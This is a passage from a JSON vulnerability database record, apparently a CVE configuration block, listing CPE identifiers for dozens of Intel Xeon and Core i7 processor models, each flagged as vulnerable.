                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699r_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4648_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4657l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3470:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1105c_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699a_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2650l_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1630_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w5590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5539:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5506:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5687:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5645:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e6540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e6510:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1578l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505m_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1258l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1276_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1241_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4628l_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2438l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2408l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1680_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2640_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2618l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2407_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2609_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2448l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1428l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2418l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4624l_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2440_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2470_v2:-:*:*:*:*:*:*:*",
